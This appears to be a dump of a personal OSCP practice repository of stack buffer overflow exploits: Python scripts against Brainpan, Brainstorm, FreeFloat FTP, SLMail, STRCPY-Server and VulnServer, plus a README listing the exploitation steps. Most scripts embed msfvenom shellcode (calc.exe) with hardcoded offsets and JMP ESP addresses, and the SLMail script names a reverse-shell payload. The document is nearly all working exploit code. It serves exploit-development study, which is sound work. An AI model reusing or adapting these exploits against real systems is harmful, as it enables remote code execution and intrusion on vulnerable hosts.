├── Brainpan
    ├── brainpan.exe
    └── exploit.py
├── Brainstorm
    ├── chatserver.exe
    ├── essfunc.dll
    └── exploit.py
├── Free-Float-FTP-1.0
    ├── FTPServer.exe
    └── exploit.py
├── README.md
├── SLMail
    └── exploit.py
├── STRCPY-Server
    ├── Server-Strcpy.exe
    └── exploit.py
└── VulnServer
    └── exploit.py


/Brainpan/brainpan.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Vedant-Bhalgama/OSCP-buffer-overflow-prep/c93b99937f3a0b337d4bc154983b80960fee4c8a/Brainpan/brainpan.exe


--------------------------------------------------------------------------------
/Brainpan/exploit.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import time
 3 | import sys
 4 | 
 5 | 
 6 | # msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f c -b '\x00'  
 7 | shellcode = (
 8 | "\xd9\xc8\xbe\x4a\x69\xe1\x93\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
 9 | "\x31\x31\x75\x18\x83\xed\xfc\x03\x75\x5e\x8b\x14\x6f\xb6\xc9"
10 | "\xd7\x90\x46\xae\x5e\x75\x77\xee\x05\xfd\x27\xde\x4e\x53\xcb"
11 | "\x95\x03\x40\x58\xdb\x8b\x67\xe9\x56\xea\x46\xea\xcb\xce\xc9"
12 | "\x68\x16\x03\x2a\x51\xd9\x56\x2b\x96\x04\x9a\x79\x4f\x42\x09"
13 | "\x6e\xe4\x1e\x92\x05\xb6\x8f\x92\xfa\x0e\xb1\xb3\xac\x05\xe8"
14 | "\x13\x4e\xca\x80\x1d\x48\x0f\xac\xd4\xe3\xfb\x5a\xe7\x25\x32"
15 | "\xa2\x44\x08\xfb\x51\x94\x4c\x3b\x8a\xe3\xa4\x38\x37\xf4\x72"
16 | "\x43\xe3\x71\x61\xe3\x60\x21\x4d\x12\xa4\xb4\x06\x18\x01\xb2"
17 | "\x41\x3c\x94\x17\xfa\x38\x1d\x96\x2d\xc9\x65\xbd\xe9\x92\x3e"
18 | "\xdc\xa8\x7e\x90\xe1\xab\x21\x4d\x44\xa7\xcf\x9a\xf5\xea\x85"
19 | "\x5d\x8b\x90\xeb\x5e\x93\x9a\x5b\x37\xa2\x11\x34\x40\x3b\xf0"
20 | "\x71\xae\xd9\xd1\x8f\x47\x44\xb0\x32\x0a\x77\x6e\x70\x33\xf4"
21 | "\x9b\x08\xc0\xe4\xe9\x0d\x8c\xa2\x02\x7f\x9d\x46\x25\x2c\x9e"
22 | "\x42\x46\xb3\x0c\x0e\xa7\x56\xb5\xb5\xb7")
23 | 
24 | offset = 524
25 | nops = '\x90' * 32
26 | buffer = 'A'*524 + '\xf3\x12\x17\x31' + nops + shellcode 
27 | 
28 | try:
29 |     c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
30 |     c.connect(('127.0.0.1', 9999))
31 |     c.recv(1024)
32 |     c.send(buffer)
33 |     c.close()
34 |     print("[+] Exploit sent!")
35 |     time.sleep(1)
36 | except:
37 |     sys.exit()
38 | 


--------------------------------------------------------------------------------
/Brainstorm/chatserver.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Vedant-Bhalgama/OSCP-buffer-overflow-prep/c93b99937f3a0b337d4bc154983b80960fee4c8a/Brainstorm/chatserver.exe


--------------------------------------------------------------------------------
/Brainstorm/essfunc.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Vedant-Bhalgama/OSCP-buffer-overflow-prep/c93b99937f3a0b337d4bc154983b80960fee4c8a/Brainstorm/essfunc.dll


--------------------------------------------------------------------------------
/Brainstorm/exploit.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import sys
 3 | import time
 4 | 
 5 | 
 6 | # Fuzzing crashes at 3000 bytes
 7 | # msfvenom -p windows/exec CMD=calc.exe -f c -b='\x00'
 8 | 
 9 | shellcode = (
10 | "\xda\xd2\xb8\x0d\x9f\xe7\x04\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
11 | "\x31\x31\x46\x18\x83\xee\xfc\x03\x46\x19\x7d\x12\xf8\xc9\x03"
12 | "\xdd\x01\x09\x64\x57\xe4\x38\xa4\x03\x6c\x6a\x14\x47\x20\x86"
13 | "\xdf\x05\xd1\x1d\xad\x81\xd6\x96\x18\xf4\xd9\x27\x30\xc4\x78"
14 | "\xab\x4b\x19\x5b\x92\x83\x6c\x9a\xd3\xfe\x9d\xce\x8c\x75\x33"
15 | "\xff\xb9\xc0\x88\x74\xf1\xc5\x88\x69\x41\xe7\xb9\x3f\xda\xbe"
16 | "\x19\xc1\x0f\xcb\x13\xd9\x4c\xf6\xea\x52\xa6\x8c\xec\xb2\xf7"
17 | "\x6d\x42\xfb\x38\x9c\x9a\x3b\xfe\x7f\xe9\x35\xfd\x02\xea\x81"
18 | "\x7c\xd9\x7f\x12\x26\xaa\xd8\xfe\xd7\x7f\xbe\x75\xdb\x34\xb4"
19 | "\xd2\xff\xcb\x19\x69\xfb\x40\x9c\xbe\x8a\x13\xbb\x1a\xd7\xc0"
20 | "\xa2\x3b\xbd\xa7\xdb\x5c\x1e\x17\x7e\x16\xb2\x4c\xf3\x75\xd8"
21 | "\x93\x81\x03\xae\x94\x99\x0b\x9e\xfc\xa8\x80\x71\x7a\x35\x43"
22 | "\x36\x74\x7f\xce\x1e\x1d\x26\x9a\x23\x40\xd9\x70\x67\x7d\x5a"
23 | "\x71\x17\x7a\x42\xf0\x12\xc6\xc4\xe8\x6e\x57\xa1\x0e\xdd\x58"
24 | "\xe0\x6c\x80\xca\x68\x5d\x27\x6b\x0a\xa1"
25 | )
26 | 
27 | 
28 | jmp_esp = "\xDF\x14\x50\x62"
29 | buffer = "A"*2012 + jmp_esp + '\x90' * 32 + shellcode
30 | 
31 | try:
32 |   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
33 |   s.connect(('127.0.0.1', 9999))
34 |   s.recv(1024)
35 |   s.send("vedant")
36 |   s.recv(1024)
37 |   s.send(buffer)
38 |   s.close()
39 |   print("[!] Exploit sent!")
40 | except:
41 |   print("[!] Error connecting to target server!")
42 |   sys.exit()
43 | 


--------------------------------------------------------------------------------
/Free-Float-FTP-1.0/FTPServer.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Vedant-Bhalgama/OSCP-buffer-overflow-prep/c93b99937f3a0b337d4bc154983b80960fee4c8a/Free-Float-FTP-1.0/FTPServer.exe


--------------------------------------------------------------------------------
/Free-Float-FTP-1.0/exploit.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | from time import sleep
 3 | import sys
 4 | # JMP ESP : 7724678A
 5 | 
 6 | jmp_esp = '\x8a\x67\x24\x77'
 7 | offset = 251
 8 | nops = '\x90' * 32
 9 | 
10 | # msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f c -b '\x00\x0a\x0d'
11 | 
12 | shellcode = (
13 | "\xda\xc2\xbd\xd6\xbe\xbe\x23\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
14 | "\x31\x31\x6e\x18\x83\xc6\x04\x03\x6e\xc2\x5c\x4b\xdf\x02\x22"
15 | "\xb4\x20\xd2\x43\x3c\xc5\xe3\x43\x5a\x8d\x53\x74\x28\xc3\x5f"
16 | "\xff\x7c\xf0\xd4\x8d\xa8\xf7\x5d\x3b\x8f\x36\x5e\x10\xf3\x59"
17 | "\xdc\x6b\x20\xba\xdd\xa3\x35\xbb\x1a\xd9\xb4\xe9\xf3\x95\x6b"
18 | "\x1e\x70\xe3\xb7\x95\xca\xe5\xbf\x4a\x9a\x04\x91\xdc\x91\x5e"
19 | "\x31\xde\x76\xeb\x78\xf8\x9b\xd6\x33\x73\x6f\xac\xc5\x55\xbe"
20 | "\x4d\x69\x98\x0f\xbc\x73\xdc\xb7\x5f\x06\x14\xc4\xe2\x11\xe3"
21 | "\xb7\x38\x97\xf0\x1f\xca\x0f\xdd\x9e\x1f\xc9\x96\xac\xd4\x9d"
22 | "\xf1\xb0\xeb\x72\x8a\xcc\x60\x75\x5d\x45\x32\x52\x79\x0e\xe0"
23 | "\xfb\xd8\xea\x47\x03\x3a\x55\x37\xa1\x30\x7b\x2c\xd8\x1a\x11"
24 | "\xb3\x6e\x21\x57\xb3\x70\x2a\xc7\xdc\x41\xa1\x88\x9b\x5d\x60"
25 | "\xed\x44\xbc\xa1\x1b\xed\x19\x20\xa6\x70\x9a\x9e\xe4\x8c\x19"
26 | "\x2b\x94\x6a\x01\x5e\x91\x37\x85\xb2\xeb\x28\x60\xb5\x58\x48"
27 | "\xa1\xd6\x3f\xda\x29\x37\xda\x5a\xcb\x47"
28 | )
29 | buffer = 'A'*offset + jmp_esp + nops + shellcode
30 | #while True:
31 | try:
32 |     c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
33 |     c.connect(('iphere', 21))
34 |     c.recv(1024) 
35 |     c.send(('USER TEST \r\n'))
36 |     c.recv(1024)
37 |     c.send(('PASS TEST \r\n'))
38 |     c.recv(1024)
39 |     c.send(buffer + '\r\n')
40 |     c.recv(1024)
41 |     c.send('QUIT\r\n')
42 |     c.close()
43 |     print("[+] Payload sent!")
44 | except:
45 |     sys.exit()
46 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # OSCP-buffer-overflow-prep
 2 | So recently, I started off with some basic exploit development, Here is a collection of all the stack overflow exploits I programmed for practicing Buffer OverFlows!
 3 | I soon will be uploading all the exploits in this repository!
 4 | 
 5 | # Steps
 6 | * Finding a vulnerable entry point in the program
 7 | * Finding the offset
 8 | * Controlling EIP
 9 | * Finding Bad Characters
10 | * Finding JMP ESP Instruction [Note: If ASLR or any other kind of protection is used in the binary, you might have to bypass them, I haven't learnt that yet]
11 | * Generating shellcode and boom!
12 | 
13 | 
14 | # List of programs I exploited till now!
15 | * VulnServer
16 | * FreeFloat FTP Server 1.0
17 | * Server-STRCPY
18 | * Brainpan
19 | * Brainstorm
20 | * OSCP Buffer Overflow Practice (TryHackMe) (Haven't done all 10, 6 more to go!)
21 | # Download Binaries
22 | * If you want to practice buffer overflows, I have also uploaded the executable files above which you can simply download and practice!
23 | 


--------------------------------------------------------------------------------
/SLMail/exploit.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | from time import sleep
 3 | import re
 4 | import sys
 5 | 
 6 | # Badchars : \x00\x0a\x0d
 7 | 
 8 | #5F 4A 35 8F   FFE4             JMP ESP
 9 | 
10 | #msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost= lport= -f python -b '\x00\x0a\x0d'
11 | 
12 | mal = ("YOUR SHELLCODE HERE")
13 | 
14 | nops = '\x90'*16
15 | eip = '\x8F\x35\x4A\x5F'
16 | offset = 2606
17 | buffer = 'A'*offset + eip + nops + mal
18 | 
19 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
20 | s.connect(("ipaddress", 110))
21 | s.send("USER pepe\r\n")
22 | s.recv(1024)
23 | s.send("PASS " + buffer + "\r\n")
24 | s.recv(1024)
25 | print("[+] Payload sent!")
26 | s.close()
27 | 


--------------------------------------------------------------------------------
/STRCPY-Server/Server-Strcpy.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Vedant-Bhalgama/OSCP-buffer-overflow-prep/c93b99937f3a0b337d4bc154983b80960fee4c8a/STRCPY-Server/Server-Strcpy.exe


--------------------------------------------------------------------------------
/STRCPY-Server/exploit.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import sys
 3 | from time import sleep
 4 | # 759E5C73   FFE4             JMP ESP
 5 | 
 6 | # msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f c -b '\x00'
 7 | 
 8 | shellc0de = (
 9 | "\xba\x87\x1e\x35\x60\xdb\xd7\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
10 | "\x31\x31\x56\x13\x03\x56\x13\x83\xee\x7b\xfc\xc0\x9c\x6b\x83"
11 | "\x2b\x5d\x6b\xe4\xa2\xb8\x5a\x24\xd0\xc9\xcc\x94\x92\x9c\xe0"
12 | "\x5f\xf6\x34\x73\x2d\xdf\x3b\x34\x98\x39\x75\xc5\xb1\x7a\x14"
13 | "\x45\xc8\xae\xf6\x74\x03\xa3\xf7\xb1\x7e\x4e\xa5\x6a\xf4\xfd"
14 | "\x5a\x1f\x40\x3e\xd0\x53\x44\x46\x05\x23\x67\x67\x98\x38\x3e"
15 | "\xa7\x1a\xed\x4a\xee\x04\xf2\x77\xb8\xbf\xc0\x0c\x3b\x16\x19"
16 | "\xec\x90\x57\x96\x1f\xe8\x90\x10\xc0\x9f\xe8\x63\x7d\x98\x2e"
17 | "\x1e\x59\x2d\xb5\xb8\x2a\x95\x11\x39\xfe\x40\xd1\x35\x4b\x06"
18 | "\xbd\x59\x4a\xcb\xb5\x65\xc7\xea\x19\xec\x93\xc8\xbd\xb5\x40"
19 | "\x70\xe7\x13\x26\x8d\xf7\xfc\x97\x2b\x73\x10\xc3\x41\xde\x7e"
20 | "\x12\xd7\x64\xcc\x14\xe7\x66\x60\x7d\xd6\xed\xef\xfa\xe7\x27"
21 | "\x54\xe4\x05\xe2\xa0\x8d\x93\x67\x09\xd0\x23\x52\x4d\xed\xa7"
22 | "\x57\x2d\x0a\xb7\x1d\x28\x56\x7f\xcd\x40\xc7\xea\xf1\xf7\xe8"
23 | "\x3e\x92\x96\x7a\xa2\x7b\x3d\xfb\x41\x84")
24 | 
25 | offset = 268
26 | nop_slides = '\x90' * 32
27 | buffer = '\x41'*offset + '\x73\x5C\x9E\x75' + nop_slides + shellc0de
28 | 
29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
30 | s.connect(('targetiphere', 10000))
31 | s.send(buffer)
32 | s.close()
33 | print("[+] Payload sent!")
34 | 


--------------------------------------------------------------------------------
/VulnServer/exploit.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import sys
 3 | 
 4 | #msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f c -b '\x00'
 5 | 
 6 | payload = ("\xd9\xcd\xba\xe0\x67\xee\xc9\xd9\x74\x24\xf4\x5f\x31\xc9\xb1"
 7 | "\x31\x83\xc7\x04\x31\x57\x14\x03\x57\xf4\x85\x1b\x35\x1c\xcb"
 8 | "\xe4\xc6\xdc\xac\x6d\x23\xed\xec\x0a\x27\x5d\xdd\x59\x65\x51"
 9 | "\x96\x0c\x9e\xe2\xda\x98\x91\x43\x50\xff\x9c\x54\xc9\xc3\xbf"
10 | "\xd6\x10\x10\x60\xe7\xda\x65\x61\x20\x06\x87\x33\xf9\x4c\x3a"
11 | "\xa4\x8e\x19\x87\x4f\xdc\x8c\x8f\xac\x94\xaf\xbe\x62\xaf\xe9"
12 | "\x60\x84\x7c\x82\x28\x9e\x61\xaf\xe3\x15\x51\x5b\xf2\xff\xa8"
13 | "\xa4\x59\x3e\x05\x57\xa3\x06\xa1\x88\xd6\x7e\xd2\x35\xe1\x44"
14 | "\xa9\xe1\x64\x5f\x09\x61\xde\xbb\xa8\xa6\xb9\x48\xa6\x03\xcd"
15 | "\x17\xaa\x92\x02\x2c\xd6\x1f\xa5\xe3\x5f\x5b\x82\x27\x04\x3f"
16 | "\xab\x7e\xe0\xee\xd4\x61\x4b\x4e\x71\xe9\x61\x9b\x08\xb0\xef"
17 | "\x5a\x9e\xce\x5d\x5c\xa0\xd0\xf1\x35\x91\x5b\x9e\x42\x2e\x8e"
18 | "\xdb\xad\xcc\x1b\x11\x46\x49\xce\x98\x0b\x6a\x24\xde\x35\xe9"
19 | "\xcd\x9e\xc1\xf1\xa7\x9b\x8e\xb5\x54\xd1\x9f\x53\x5b\x46\x9f"
20 | "\x71\x38\x09\x33\x19\x91\xac\xb3\xb8\xed")
21 | 
22 | return_address = "\xaf\x11\x50\x62"
23 | 
24 | offset = 2003
25 | payload = "A" * offset + return_address + "\x90" * 32 + payload 
26 | try:
27 |         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
28 |         s.connect(('iphere', 9999))
29 |         s.send(('TRUN /.:/' + payload))
30 |         s.close()
31 |         print("[+] Payload sent!")
32 | except:
33 |         sys.exit()
34 | 		
35 | 


--------------------------------------------------------------------------------